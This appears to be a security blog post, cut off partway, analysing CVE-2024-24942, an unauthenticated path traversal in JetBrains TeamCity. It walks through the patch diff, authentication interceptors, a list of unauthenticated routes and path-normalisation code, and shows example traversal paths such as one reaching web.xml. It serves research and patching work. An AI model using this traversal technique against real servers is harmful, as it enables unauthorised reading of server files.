Security | Training | Testing https://blog.0daylabs.com/ Sun, 21 Dec 2025 01:18:59 -0800 Sun, 21 Dec 2025 01:18:59 -0800 Jekyll v3.10.0 Diving deep into Jetbrains TeamCity Part 2 - Analysing CVE-2024-24942 leading to unauthenticated Path Traversal <h2 id="introduction">Introduction</h2> <p>In the first edition of our TeamCity vulnerability series, we explored a critical issue that lead to <a href="/2024/05/27/jetbrains-teamcity-auth-bypass/">Authentication Bypass</a>. Here, we continue by examining another interesting vulnerability, CVE-2024-24942. This flaw, present in JetBrains TeamCity versions prior to 2023.11.3, involves a path traversal vulnerability that allows attackers to access data within JAR archives.</p> <table> <thead> <tr> <th>Version</th> <th>Status</th> <th>Download Link</th> </tr> </thead> <tbody> <tr> <td>Versions prior to 2023.11.3</td> <td>Affected</td> <td><a href="https://download.jetbrains.com/teamcity/TeamCity-2023.11.2.tar.gz">https://download.jetbrains.com/teamcity/TeamCity-2023.11.2.tar.gz</a></td> </tr> <tr> <td>2023.11.3</td> <td>Patched</td> <td><a href="https://download.jetbrains.com/teamcity/TeamCity-2023.11.3.tar.gz">https://download.jetbrains.com/teamcity/TeamCity-2023.11.3.tar.gz</a></td> </tr> </tbody> </table> <p><strong><u>Note</u></strong>: We highly encourage going through the <a href="/2024/05/27/jetbrains-teamcity-auth-bypass/">first part</a> of the TeamCity Vulnerability series before continuing as it provides the essential background knowledge that will enhance your grasp of the issues discussed here.</p> <h2 id="understanding-the-patch">Understanding the Patch</h2> <p><code class="language-plaintext highlighter-rouge">CVE-2024-24942</code> is a path traversal vulnerability in <code class="language-plaintext highlighter-rouge">SwaggerUI.java</code> within JetBrains TeamCity. SwaggerUI, an open-source tool, generates interactive API documentation and facilitates automation tasks like triggering builds and managing projects. Static analysis and debugging pinpointed the issue to SwaggerUI.java, where improper input validation allowed attackers to exploit a path traversal flaw, granting access to restricted data within JAR archives in versions before 2023.11.3.</p> <p>For the purpose of understanding the vulnerability better, lets diff the SwaggerUI.java file from both affected as well as the patched versions.</p> <div align="center"><img src="/images/2024/teamcity/swaggeruiutils.png" alt="SwaggerUIUtils" height="500" width="850" /></div> <p><code class="language-plaintext highlighter-rouge">/{path:.*}</code>is a URI path pattern(Java-specific), which uses regular expressions to capture any value passed after the base URI (including dots and slashes). Consider an API path, <code class="language-plaintext highlighter-rouge">/app/rest/swaggerui</code>, the above annotation specifies that any number of directories are possible after the actual path.</p> <p>For example:</p> <ul> <li><code class="language-plaintext highlighter-rouge">/app/rest/swaggerui/x/y/z</code> will pass.</li> <li><code class="language-plaintext highlighter-rouge">/app/rest/swaggerui/../../web.xml</code> this should also pass.</li> </ul> <p>From diffing the above files, the change is replacing the class <code class="language-plaintext highlighter-rouge">SwaggerUIUtil</code> with <code class="language-plaintext highlighter-rouge">SwaggerUtil</code> for the <code class="language-plaintext highlighter-rouge">getFileFromResources</code> method.</p> <p><strong><u>File</u></strong>: <em>TeamCity-2023.11.3/TeamCity/webapps/ROOT/WEB-INF/plugins/rest-api/server/rest-api-2023.09-147512.jar!/jetbrains/buildServer/server/rest/swagger/SwaggerUtil.class</em></p> <figure class="highlight"><pre><code class="language-bash" data-lang="bash">public static InputStream getFileFromResources<span class="o">(</span>@NotNull String path<span class="o">)</span> <span class="o">{</span> <span class="k">if</span> <span class="o">(</span>path <span class="o">==</span> null<span class="o">)</span> <span class="o">{</span> <span class="nv">$$$reportNull$$$0</span><span class="o">(</span>0<span class="o">)</span><span class="p">;</span> <span class="o">}</span> String fullPath <span class="o">=</span> <span class="s2">"swagger/"</span> + path<span class="p">;</span> <span class="k">if</span> <span class="o">(!</span>isValidResourcePath<span class="o">(</span>fullPath<span class="o">))</span> <span class="o">{</span> throw new IllegalArgumentException<span class="o">(</span>String.format<span class="o">(</span><span class="s2">"File %s was not found"</span>, fullPath<span class="o">))</span><span class="p">;</span> <span class="o">}</span> <span class="k">else</span> <span class="o">{</span> InputStream var10000 <span class="o">=</span> <span class="o">(</span>InputStream<span class="o">)</span> Objects.requireNonNull<span class="o">(</span>SwaggerUtil.class.getClassLoader<span class="o">()</span>.getResourceAsStream<span class="o">(</span>fullPath<span class="o">))</span><span class="p">;</span> <span class="k">if</span> <span class="o">(</span>var10000 <span class="o">==</span> null<span class="o">)</span> <span class="o">{</span> <span class="nv">$$$reportNull$$$0</span><span class="o">(</span>1<span class="o">)</span><span class="p">;</span> <span class="o">}</span> <span class="k">return </span>var10000<span class="p">;</span> <span class="o">}</span> <span class="o">}</span> private static boolean isValidResourcePath<span class="o">(</span>@NotNull String path<span class="o">)</span> <span class="o">{</span> <span class="k">if</span> <span class="o">(</span>path <span class="o">==</span> null<span class="o">)</span> <span class="o">{</span> <span class="nv">$$$reportNull$$$0</span><span class="o">(</span>2<span class="o">)</span><span class="p">;</span> <span class="o">}</span> <span class="k">return</span> <span class="o">!</span>path.contains<span class="o">(</span><span class="s2">".."</span><span class="o">)</span> <span class="o">&amp;&amp;</span> SwaggerUtil.class.getClassLoader<span class="o">()</span>.getResource<span class="o">(</span>path<span class="o">)</span> <span class="o">!=</span> null<span class="p">;</span> <span class="o">}</span></code></pre></figure> <p>In the patched version, the <code class="language-plaintext highlighter-rouge">getFileFromResources</code> method protects against path traversal vulnerabilities more effectively than the first due to its additional checks and validations.</p> <h2 id="request-interceptors">Request Interceptors</h2> <p>Having confirmed the presence of a path traversal vulnerability, our next step is to determine if the vulnerable endpoint requires authentication and, if so, attempt to access it without authentication. To achieve this, we need to identify the <a href="https://blog.0daylabs.com/2024/05/27/jetbrains-teamcity-auth-bypass/#spring-interceptors">interceptor</a> responsible for authentication by examining the list of all interceptors called during a request.</p> <div align="center"><img src="/images/2024/teamcity/request_interceptors.png" alt="TeamCity Request Interceptors" height="600" /></div> <p>Through dynamic debugging, we can trace the execution flow by setting a breakpoint in the <code class="language-plaintext highlighter-rouge">preHandle()</code> of <code class="language-plaintext highlighter-rouge">RequestInterceptors.java</code>. This will capture all the interceptors that the request passes through, essentially revealing the stack of interceptors(StackTrace). The interceptors involved in the process are as follows:</p> <figure class="highlight"><pre><code class="language-bash" data-lang="bash">1. <span class="o">=</span> <span class="o">{</span>MainServerInterceptor@32568<span class="o">}</span> 2. <span class="o">=</span> <span class="o">{</span>RegistrationInvitations@31464<span class="o">}</span> 3. <span class="o">=</span> <span class="o">{</span>ProjectIdConverterInterceptor@31465<span class="o">}</span> 4. <span class="o">=</span> <span class="o">{</span>AuthorizationInterceptorImpl@31466<span class="o">}</span> &lt;<span class="nt">----</span> this checks <span class="k">if </span>route need authentication 5. <span class="o">=</span> <span class="o">{</span>TwoFactorAuthenticationInterceptor@32569<span class="o">}</span> 6. <span class="o">=</span> <span class="o">{</span>DomainIsolationProtectionInterceptor@32670<span class="o">}</span> 7. <span class="o">=</span> <span class="o">{</span>FirstLoginInterceptor@32671<span class="o">}</span> 8. <span class="o">=</span> <span class="o">{</span>PluginUIContextProvider@32672<span class="o">}</span> 9. <span class="o">=</span> <span class="o">{</span>CallableInterceptorRegistrar@32673<span class="o">}</span> 10. <span class="o">=</span> <span class="o">{</span>DiagnosticInterceptor@32674<span class="o">}</span> 11. <span class="o">=</span> <span class="o">{</span>CallableInterceptorRegistrar@32675<span class="o">}</span></code></pre></figure> <p><code class="language-plaintext highlighter-rouge">AuthorizationInterceptorImpl.java</code> checks if a route requires authentication. Let’s see the prehandle function of <code class="language-plaintext highlighter-rouge">AuthorizationInterceptorImpl.java</code> to see how a path is authenticated:</p> <p><strong><u>File</u></strong>: <em>TeamCity-2023.11.2/TeamCity/webapps/ROOT/WEB-INF/lib/web-core.jar!/jetbrains/buildServer/controllers/interceptors/AuthorizationInterceptorImpl.class</em></p> <figure class="highlight"><pre><code class="language-java" data-lang="java"><span class="kd">public</span> <span class="kt">boolean</span> <span class="nf">preHandle</span><span class="o">(</span><span class="nd">@NotNull</span> <span class="kd">final</span> <span class="nc">HttpServletRequest</span> <span class="n">request</span><span class="o">,</span> <span class="nd">@NotNull</span> <span class="kd">final</span> <span class="nc">HttpServletResponse</span> <span class="n">response</span><span class="o">,</span> <span class="nc">Object</span> <span class="n">object</span><span class="o">)</span> <span class="kd">throws</span> <span class="nc">Exception</span> <span class="o">{</span> <span class="k">return</span> <span class="o">(</span><span class="nc">Boolean</span><span class="o">)</span> <span class="nc">NamedThreadFactory</span><span class="o">.</span><span class="na">executeWithNewThreadName</span><span class="o">(</span><span class="s">"Handling authentication"</span><span class="o">,</span> <span class="k">new</span> <span class="nc">Callable</span> <span class="o">&lt;</span> <span class="nc">Boolean</span> <span class="o">&gt;</span> <span class="o">()</span> <span class="o">{</span> <span class="kd">public</span> <span class="nc">Boolean</span> <span class="nf">call</span><span class="o">()</span> <span class="kd">throws</span> <span class="nc">Exception</span> <span class="o">{</span> <span class="nc">String</span> <span class="n">unauthenticatedReason</span> <span class="o">=</span> <span class="kc">null</span><span class="o">;</span> <span class="k">try</span> <span class="o">{</span> <span class="nc">SUser</span> <span class="n">user</span> <span class="o">=</span> <span class="nc">AuthorizationInterceptorImpl</span><span class="o">.</span><span class="na">this</span><span class="o">.</span><span class="na">tryRefreshLogin</span><span class="o">(</span><span class="n">request</span><span class="o">,</span> <span class="n">response</span><span class="o">);</span> <span class="nc">String</span> <span class="n">nodeId</span><span class="o">;</span> <span class="k">if</span> <span class="o">(</span><span class="n">user</span> <span class="o">!=</span> <span class="kc">null</span><span class="o">)</span> <span class="o">{</span> <span class="n">nodeId</span> <span class="o">=</span> <span class="nc">AuthorizationInterceptorImpl</span><span class="o">.</span><span class="na">this</span><span class="o">.</span><span class="na">myUsersLoadBalancer</span><span class="o">.</span><span class="na">assignAuthenticatedUserToNode</span><span class="o">(</span><span class="n">user</span><span class="o">,</span> <span class="n">request</span><span class="o">,</span> <span class="n">response</span><span class="o">);</span> <span class="k">if</span> <span class="o">(</span><span class="n">nodeId</span> <span class="o">!=</span> <span class="kc">null</span> <span class="o">&amp;&amp;</span> <span class="nc">AuthorizationInterceptorImpl</span><span class="o">.</span><span class="na">this</span><span class="o">.</span><span class="na">redirectedToNode</span><span class="o">(</span><span class="n">nodeId</span><span class="o">,</span> <span class="n">request</span><span class="o">,</span> <span class="n">response</span><span class="o">))</span> <span class="o">{</span> <span class="k">return</span> <span class="kc">false</span><span class="o">;</span> <span class="o">}</span> <span class="nc">AuthorizationInterceptorImpl</span><span class="o">.</span><span class="na">this</span><span class="o">.</span><span class="na">checkUserPermissions</span><span class="o">(</span><span class="n">request</span><span class="o">);</span> <span class="k">return</span> <span class="nc">AuthorizationInterceptorImpl</span><span class="o">.</span><span class="na">this</span><span class="o">.</span><span class="na">checkCsrfWithAuthenticatedUser</span><span class="o">(</span><span class="n">request</span><span class="o">,</span> <span class="n">response</span><span class="o">);</span> <span class="o">}</span> <span class="n">nodeId</span> <span class="o">=</span> <span class="nc">AuthorizationInterceptorImpl</span><span class="o">.</span><span class="na">this</span><span class="o">.</span><span class="na">myUsersLoadBalancer</span><span class="o">.</span><span class="na">assignUnauthenticatedRequestToNode</span><span class="o">(</span><span class="n">request</span><span class="o">,</span> <span class="n">response</span><span class="o">);</span> <span class="k">if</span> <span class="o">(</span><span class="n">nodeId</span> <span class="o">!=</span> <span class="kc">null</span> <span class="o">&amp;&amp;</span> <span class="nc">AuthorizationInterceptorImpl</span><span class="o">.</span><span class="na">this</span><span class="o">.</span><span class="na">redirectedToNode</span><span class="o">(</span><span class="n">nodeId</span><span class="o">,</span> <span class="n">request</span><span class="o">,</span> <span class="n">response</span><span class="o">))</span> <span class="o">{</span> <span class="k">return</span> <span class="kc">false</span><span class="o">;</span> <span class="o">}</span> <span class="nc">String</span> <span class="n">path</span> <span class="o">=</span> <span class="nc">WebUtil</span><span class="o">.</span><span class="na">getPathWithoutContext</span><span class="o">(</span><span class="n">request</span><span class="o">);</span> <span class="k">if</span> <span class="o">(!</span><span class="nc">AuthorizationInterceptorImpl</span><span class="o">.</span><span class="na">this</span><span class="o">.</span><span class="na">myAuthorizationPaths</span><span class="o">.</span><span class="na">isAuthenticationRequired</span><span class="o">(</span><span class="n">path</span><span class="o">))</span> <span class="o">{</span> <span class="k">return</span> <span class="kc">true</span><span class="o">;</span> <span class="o">}</span> <span class="k">if</span> <span class="o">(</span><span class="nc">AuthorizationInterceptorImpl</span><span class="o">.</span><span class="na">this</span><span class="o">.</span><span class="na">myAuthManager</span><span class="o">.</span><span class="na">shouldNotTryToReauthenticate</span><span class="o">(</span><span class="n">request</span><span class="o">))</span> <span class="o">{</span> <span class="o">(</span><span class="k">new</span> <span class="nc">UnauthorizedResponseHelper</span><span class="o">(</span><span class="n">response</span><span class="o">,</span> <span class="kc">false</span><span class="o">)).</span><span class="na">send</span><span class="o">(</span><span class="n">request</span><span class="o">,</span> <span class="o">(</span><span class="nc">String</span><span class="o">)</span> <span class="kc">null</span><span class="o">);</span> <span class="k">return</span> <span class="kc">false</span><span class="o">;</span> <span class="o">}</span> <span class="kt">boolean</span> <span class="n">canRedirect</span> <span class="o">=</span> <span class="nc">AuthorizationInterceptorImpl</span><span class="o">.</span><span class="na">this</span><span class="o">.</span><span class="na">isBrowserRequest</span><span class="o">(</span><span class="n">request</span><span class="o">);</span> <span class="nc">HttpAuthenticationResult</span> <span class="n">authResult</span> <span class="o">=</span> <span class="nc">AuthorizationInterceptorImpl</span><span class="o">.</span><span class="na">this</span><span class="o">.</span><span class="na">myAuthManager</span><span class="o">.</span><span class="na">processAuthenticationRequest</span><span class="o">(</span><span class="n">request</span><span class="o">,</span> <span class="n">response</span><span class="o">,</span> <span class="n">canRedirect</span><span class="o">);</span> <span class="k">if</span> <span class="o">(</span><span class="n">authResult</span><span class="o">.</span><span class="na">getType</span><span class="o">()</span> <span class="o">==</span> <span class="nc">Type</span><span class="o">.</span><span class="na">AUTHENTICATED</span><span class="o">)</span> <span class="o">{</span> <span class="nc">AuthorizationInterceptorImpl</span><span class="o">.</span><span class="na">this</span><span class="o">.</span><span class="na">checkUserPermissions</span><span class="o">(</span><span class="n">request</span><span class="o">);</span> <span class="k">if</span> <span class="o">(!</span><span class="nc">AuthorizationInterceptorImpl</span><span class="o">.</span><span class="na">this</span><span class="o">.</span><span class="na">checkCsrfWithAuthenticatedUser</span><span class="o">(</span><span class="n">request</span><span class="o">,</span> <span class="n">response</span><span class="o">))</span> <span class="o">{</span> <span class="k">return</span> <span class="kc">false</span><span class="o">;</span> <span class="o">}</span> <span class="nc">AuthorizationInterceptorImpl</span><span class="o">.</span><span class="na">checkRedirect</span><span class="o">(</span><span class="n">authResult</span><span class="o">,</span> <span class="n">canRedirect</span><span class="o">);</span> <span class="k">return</span> <span class="kc">true</span><span class="o">;</span> <span class="o">}</span> <span class="k">if</span> <span class="o">(</span><span class="n">authResult</span><span class="o">.</span><span class="na">getType</span><span class="o">()</span> <span class="o">==</span> <span class="nc">Type</span><span class="o">.</span><span class="na">UNAUTHENTICATED</span><span class="o">)</span> <span class="o">{</span> <span class="nc">AuthorizationInterceptorImpl</span><span class="o">.</span><span class="na">checkRedirect</span><span class="o">(</span><span class="n">authResult</span><span class="o">,</span> <span class="n">canRedirect</span><span class="o">);</span> <span class="k">return</span> <span class="kc">false</span><span class="o">;</span> <span class="o">}</span> <span class="k">if</span> <span class="o">(</span><span class="nc">AuthorizationInterceptorImpl</span><span class="o">.</span><span class="na">this</span><span class="o">.</span><span class="na">adminSetupRedirect</span><span class="o">(</span><span class="n">request</span><span class="o">))</span> <span class="o">{</span> <span class="k">if</span> <span class="o">(</span><span class="n">canRedirect</span><span class="o">)</span> <span class="o">{</span> <span class="n">response</span><span class="o">.</span><span class="na">sendRedirect</span><span class="o">(</span><span class="n">request</span><span class="o">.</span><span class="na">getContextPath</span><span class="o">()</span> <span class="o">+</span> <span class="s">"/setupAdmin.html?init=1"</span><span class="o">);</span> <span class="k">return</span> <span class="kc">false</span><span class="o">;</span> <span class="o">}</span> <span class="n">unauthenticatedReason</span> <span class="o">=</span> <span class="s">"There is no administrator account on the server"</span><span class="o">;</span> <span class="o">}</span> <span class="nc">AuthorizationInterceptorImpl</span><span class="o">.</span><span class="na">this</span><span class="o">.</span><span class="na">rememberUrlIfNeeded</span><span class="o">(</span><span class="n">request</span><span class="o">,</span> <span class="n">path</span><span class="o">);</span> <span class="o">}</span> <span class="k">catch</span> <span class="o">(</span><span class="nc">RedirectException</span> <span class="n">var7</span><span class="o">)</span> <span class="o">{</span> <span class="nc">RedirectException</span> <span class="n">e</span> <span class="o">=</span> <span class="n">var7</span><span class="o">;</span> <span class="n">response</span><span class="o">.</span><span class="na">sendRedirect</span><span class="o">(</span><span class="n">e</span><span class="o">.</span><span class="na">getRedirectUrl</span><span class="o">());</span> <span class="k">return</span> <span class="kc">false</span><span class="o">;</span> <span class="o">}</span> <span class="k">catch</span> <span class="o">(</span><span class="nc">AccessDeniedException</span> <span class="n">var8</span><span class="o">)</span> <span class="o">{</span> <span class="nc">AccessDeniedException</span> <span class="n">ex</span> <span class="o">=</span> <span class="n">var8</span><span class="o">;</span> <span class="k">if</span> <span class="o">(</span><span class="nc">AuthorizationInterceptorImpl</span><span class="o">.</span><span class="na">this</span><span class="o">.</span><span class="na">isBrowserRequest</span><span class="o">(</span><span class="n">request</span><span class="o">))</span> <span class="o">{</span> <span class="nc">WebAuthUtil</span><span class="o">.</span><span class="na">addAccessDeniedMessage</span><span class="o">(</span><span class="n">request</span><span class="o">,</span> <span class="n">ex</span><span class="o">);</span> <span class="n">response</span><span class="o">.</span><span class="na">sendRedirect</span><span class="o">(</span><span class="nc">OverviewController</span><span class="o">.</span><span class="na">getOverviewPageUrl</span><span class="o">(</span><span class="n">request</span><span class="o">));</span> <span class="k">return</span> <span class="kc">false</span><span class="o">;</span> <span class="o">}</span> <span class="n">unauthenticatedReason</span> <span class="o">=</span> <span class="s">"Access denied: "</span> <span class="o">+</span> <span class="n">ex</span><span class="o">.</span><span class="na">getMessage</span><span class="o">();</span> <span class="o">}</span> <span class="nc">AuthorizationInterceptorImpl</span><span class="o">.</span><span class="na">this</span><span class="o">.</span><span class="na">myAuthManager</span><span class="o">.</span><span class="na">processUnauthenticatedRequest</span><span class="o">(</span><span class="n">request</span><span class="o">,</span> <span class="n">response</span><span class="o">,</span> <span class="n">unauthenticatedReason</span><span class="o">,</span> <span class="nc">AuthorizationInterceptorImpl</span><span class="o">.</span><span class="na">this</span><span class="o">.</span><span class="na">isBrowserRequest</span><span class="o">(</span><span class="n">request</span><span class="o">));</span> <span class="k">return</span> <span class="kc">false</span><span class="o">;</span> <span class="o">}</span> <span class="o">});</span> <span class="o">}</span></code></pre></figure> <p><code class="language-plaintext highlighter-rouge">!AuthorizationInterceptorImpl.this.myAuthorizationPaths.isAuthenticationRequired(path)</code> checks whether authentication is required for a specific path. <code class="language-plaintext highlighter-rouge">myAuthorizationPaths</code> holds information about paths(routes) and their associated authentication requirements. By adding a breakpoint in the above condition, we can get the paths which does not require authentication.</p> <div align="center"><img src="/images/2024/teamcity/authorization_interceptor.png" alt="Listing endpoints that doesn't need authentication" height="600" /></div> <p><code class="language-plaintext highlighter-rouge">MyAuthorizedPaths</code> is calling its function <code class="language-plaintext highlighter-rouge">isAuthenticationRequired()</code>, put a breakpoint there and get all the endpoints that doesn’t require authentication.</p> <figure class="highlight"><pre><code class="language-bash" data-lang="bash">1 <span class="o">=</span> <span class="s2">"/.well-known/acme-challenge/**"</span> 2 <span class="o">=</span> <span class="s2">"/app/agentParameters/*"</span> 3 <span class="o">=</span> <span class="s2">"/app/dsl-plugins-repository/**"</span> 4 <span class="o">=</span> <span class="s2">"/app/dsl-documentation/**"</span> 5 <span class="o">=</span> <span class="s2">"/app/rest/2018.1/builds/*/statusIcon*"</span> 6 <span class="o">=</span> <span class="s2">"/app/rest/2018.1/builds/aggregated/*/statusIcon*"</span> 7 <span class="o">=</span> <span class="s2">"/app/rest/2018.1/swagger**"</span> 8 <span class="o">=</span> <span class="s2">"/app/rest/builds/*/statusIcon*"</span> 9 <span class="o">=</span> <span class="s2">"/app/rest/builds/aggregated/*/statusIcon*"</span> 10 <span class="o">=</span> <span class="s2">"/app/rest/swagger**"</span> &lt;<span class="nt">--------------</span> no auth needed 11 <span class="o">=</span> <span class="s2">"/app/rest/latest/builds/*/statusIcon*"</span> 12 <span class="o">=</span> <span class="s2">"/app/rest/latest/builds/aggregated/*/statusIcon*"</span> 13 <span class="o">=</span> <span class="s2">"/app/rest/latest/swagger**"</span> 14 <span class="o">=</span> <span class="s2">"/app/rest/ui/builds/*/statusIcon*"</span> 15 <span class="o">=</span> <span class="s2">"/app/rest/ui/builds/aggregated/*/statusIcon*"</span> 16 <span class="o">=</span> <span class="s2">"/app/rest/ui/swagger**"</span> 17 <span class="o">=</span> <span class="s2">"/api/builds/*/statusIcon*"</span> 18 <span class="o">=</span> <span class="s2">"/api/builds/aggregated/*/statusIcon*"</span> 19 <span class="o">=</span> <span class="s2">"/api/swagger**"</span> 20 <span class="o">=</span> <span class="s2">"/app/graphql/builds/*/statusIcon*"</span> 21 <span class="o">=</span> <span class="s2">"/app/graphql/builds/aggregated/*/statusIcon*"</span> 22 <span class="o">=</span> <span class="s2">"/app/graphql/swagger**"</span></code></pre></figure> <p>The route <code class="language-plaintext highlighter-rouge">app/rest/swagger**</code> is configured as an unauthenticated endpoint. This could potentially open up the path to a path traversal vulnerability. In TeamCity, a route is handled by <code class="language-plaintext highlighter-rouge">RequestMappingInfoHandlerMapping</code> which is responsible for mapping incoming requests to their respective handlers (controllers or methods). When a request is made to a particular route, <code class="language-plaintext highlighter-rouge">RequestMappingInfoHandlerMapping</code> delegates a path matching.</p> <p><strong><u>File</u></strong>: <em>TeamCity-2023.11.2/TeamCity/webapps/ROOT/WEB-INF/lib/spring-webmvc.jar!/org/springframework/web/servlet/mvc/method/RequestMappingInfoHandlerMapping.class</em></p> <figure class="highlight"><pre><code class="language-java" data-lang="java"><span class="kd">protected</span> <span class="nc">RequestMappingInfo</span> <span class="nf">getMatchingMapping</span><span class="o">(</span><span class="nc">RequestMappingInfo</span> <span class="n">info</span><span class="o">,</span> <span class="nc">HttpServletRequest</span> <span class="n">request</span><span class="o">)</span> <span class="o">{</span> <span class="k">return</span> <span class="n">info</span><span class="o">.</span><span class="na">getMatchingCondition</span><span class="o">(</span><span class="n">request</span><span class="o">);</span> <span class="o">}</span></code></pre></figure> <p>In Spring Framework, path matching for handling incoming requests is often done using <code class="language-plaintext highlighter-rouge">AntPathMatcher</code> from <code class="language-plaintext highlighter-rouge">org.springframework.util</code> package. <code class="language-plaintext highlighter-rouge">AntPathMatcher</code> is used to match paths against predefined patterns and supports wildcards like <code class="language-plaintext highlighter-rouge">*</code> (matching zero or more characters) and <code class="language-plaintext highlighter-rouge">**</code>(matching zero or more directories).</p> <p>The pattern <code class="language-plaintext highlighter-rouge">app/rest/swagger**</code> matches paths such as:</p> <ul> <li><code class="language-plaintext highlighter-rouge">app/rest/swaggeruixyz</code></li> <li><code class="language-plaintext highlighter-rouge">app/rest/swaggerui/xyz</code> (limited to one additional directory)</li> </ul> <p>This means that paths like <code class="language-plaintext highlighter-rouge">app/rest/swaggerXXXX/</code>.. are valid, however, it won’t match paths like:</p> <ul> <li><code class="language-plaintext highlighter-rouge">app/rest/swaggerui/xx/yy</code> (to match this, we need <code class="language-plaintext highlighter-rouge">app/rest/swaggerui/**</code>, <code class="language-plaintext highlighter-rouge">**</code> after the <code class="language-plaintext highlighter-rouge">/</code>)</li> <li><code class="language-plaintext highlighter-rouge">app/rest/swaggeruixx/xx/yy</code> (to match this, we need <code class="language-plaintext highlighter-rouge">app/rest/swaggerui*/**</code>)</li> </ul> <p>Therefore, when trying a typical traversal attack like accessing <code class="language-plaintext highlighter-rouge">site.com/app/rest/swaggerui/../../web.xml</code>, the attack does not seem to succeed.</p> <p>As we approach the core of our exploit, let’s take a closer look at the following code from <code class="language-plaintext highlighter-rouge">AuthorizationInterceptorImpl.java</code> once again:</p> <p><strong><u>File</u></strong>: <em>TeamCity-2023.11.2/TeamCity/webapps/ROOT/WEB-INF/lib/web-core.jar!/jetbrains/buildServer/controllers/interceptors/AuthorizationInterceptorImpl.class</em></p> <figure class="highlight"><pre><code class="language-java" data-lang="java"><span class="nc">String</span> <span class="n">path</span> <span class="o">=</span> <span class="nc">WebUtil</span><span class="o">.</span><span class="na">getPathWithoutContext</span><span class="o">(</span><span class="n">request</span><span class="o">);</span> <span class="k">if</span> <span class="o">(!</span><span class="nc">AuthorizationInterceptorImpl</span><span class="o">.</span><span class="na">this</span><span class="o">.</span><span class="na">myAuthorizationPaths</span><span class="o">.</span><span class="na">isAuthenticationRequired</span><span class="o">(</span><span class="n">path</span><span class="o">))</span> <span class="o">{</span> <span class="k">return</span> <span class="kc">true</span><span class="o">;</span></code></pre></figure> <p>The path is extracted from the request using <code class="language-plaintext highlighter-rouge">getPathWithoutContext()</code> in <code class="language-plaintext highlighter-rouge">WebUtil.java</code>. Let’s have a look at what this method does:</p> <p><strong><u>File</u></strong>: <em>TeamCity-2023.11.2/TeamCity/webapps/ROOT/WEB-INF/lib/web-openapi.jar!/jetbrains/buildServer/web/util/WebUtil.class</em></p> <figure class="highlight"><pre><code class="language-java" data-lang="java"><span class="kd">public</span> <span class="kd">static</span> <span class="nc">String</span> <span class="nf">getPathWithoutContext</span><span class="o">(</span><span class="nd">@NotNull</span> <span class="nc">HttpServletRequest</span> <span class="n">request</span><span class="o">)</span> <span class="o">{</span> <span class="nc">String</span> <span class="n">reqURI</span> <span class="o">=</span> <span class="nc">StringUtil</span><span class="o">.</span><span class="na">notNullize</span><span class="o">(</span><span class="n">request</span><span class="o">.</span><span class="na">getRequestURI</span><span class="o">());</span> <span class="k">return</span> <span class="nf">getPathWithoutContext</span><span class="o">(</span><span class="n">request</span><span class="o">,</span> <span class="n">reqURI</span><span class="o">);</span> <span class="o">}</span> <span class="kd">public</span> <span class="kd">static</span> <span class="nc">String</span> <span class="nf">getPathWithoutContext</span><span class="o">(</span><span class="nd">@NotNull</span> <span class="nc">HttpServletRequest</span> <span class="n">request</span><span class="o">,</span> <span class="nd">@NotNull</span> <span class="nc">String</span> <span class="n">reqURI</span><span class="o">)</span> <span class="o">{</span> <span class="k">return</span> <span class="nf">removeSessionId</span><span class="o">(</span><span class="n">removeStartingSlashes</span><span class="o">(</span><span class="n">stripContextPath</span><span class="o">(</span><span class="n">request</span><span class="o">,</span> <span class="n">reqURI</span><span class="o">)));</span> <span class="o">}</span> <span class="o">...</span> <span class="kd">public</span> <span class="kd">static</span> <span class="nc">String</span> <span class="nf">removeSessionId</span><span class="o">(</span><span class="nd">@NotNull</span> <span class="nc">String</span> <span class="n">uri</span><span class="o">)</span> <span class="o">{</span> <span class="kt">int</span> <span class="n">idx</span> <span class="o">=</span> <span class="n">uri</span><span class="o">.</span><span class="na">indexOf</span><span class="o">(</span><span class="mi">59</span><span class="o">);</span> <span class="c1">//-&gt; 59 ascii of ;</span> <span class="k">return</span> <span class="n">idx</span> <span class="o">==</span> <span class="o">-</span><span class="mi">1</span> <span class="o">?</span> <span class="n">uri</span> <span class="o">:</span> <span class="n">uri</span><span class="o">.</span><span class="na">substring</span><span class="o">(</span><span class="mi">0</span><span class="o">,</span> <span class="n">idx</span><span class="o">);</span> <span class="o">}</span> <span class="kd">private</span> <span class="kd">static</span> <span class="nc">String</span> <span class="nf">stripContextPath</span><span class="o">(</span><span class="nd">@NotNull</span> <span class="nc">HttpServletRequest</span> <span class="n">request</span><span class="o">,</span> <span class="nd">@NotNull</span> <span class="nc">String</span> <span class="n">reqURI</span><span class="o">)</span> <span class="o">{</span> <span class="k">return</span> <span class="n">reqURI</span><span class="o">.</span><span class="na">substring</span><span class="o">(</span><span class="n">request</span><span class="o">.</span><span class="na">getContextPath</span><span class="o">().</span><span class="na">length</span><span class="o">());</span> <span class="o">}</span> <span class="nd">@NotNull</span> <span class="kd">private</span> <span class="kd">static</span> <span class="nc">String</span> <span class="nf">removeStartingSlashes</span><span class="o">(</span><span class="nd">@NotNull</span> <span class="nc">String</span> <span class="n">requestURI</span><span class="o">)</span> <span class="o">{</span> <span class="k">for</span> <span class="o">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="o">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">requestURI</span><span class="o">.</span><span class="na">length</span><span class="o">();</span> <span class="o">++</span><span class="n">i</span><span class="o">)</span> <span class="o">{</span> <span class="k">if</span> <span class="o">(</span><span class="n">requestURI</span><span class="o">.</span><span class="na">charAt</span><span class="o">(</span><span class="n">i</span><span class="o">)</span> <span class="o">!=</span> <span class="sc">'/'</span><span class="o">)</span> <span class="o">{</span> <span class="k">if</span> <span class="o">(</span><span class="n">i</span> <span class="o">==</span> <span class="mi">1</span><span class="o">)</span> <span class="o">{</span> <span class="k">return</span> <span class="n">requestURI</span><span class="o">;</span> <span class="o">}</span> <span class="k">return</span> <span class="sc">'/'</span> <span class="o">+</span> <span class="n">requestURI</span><span class="o">.</span><span class="na">substring</span><span class="o">(</span><span class="n">i</span><span class="o">);</span> <span class="o">}</span> <span class="o">}</span> <span class="k">return</span> <span class="s">"/"</span><span class="o">;</span> <span class="o">}</span></code></pre></figure> <ul> <li><code class="language-plaintext highlighter-rouge">getPathWithoutContext()</code>: Extracts the request URI, removing the context path (base URL) and sanitizing it for further processing.</li> <li><code class="language-plaintext highlighter-rouge">stripContextPath()</code>: Removes the context path (e.g., <code class="language-plaintext highlighter-rouge">/app</code>) from the request URI, leaving only the relevant portion (e.g., <code class="language-plaintext highlighter-rouge">/rest/swaggerui</code>).</li> <li><code class="language-plaintext highlighter-rouge">removeStartingSlashes()</code>: Ensures the URI has only one leading slash by trimming any extra slashes (e.g., <code 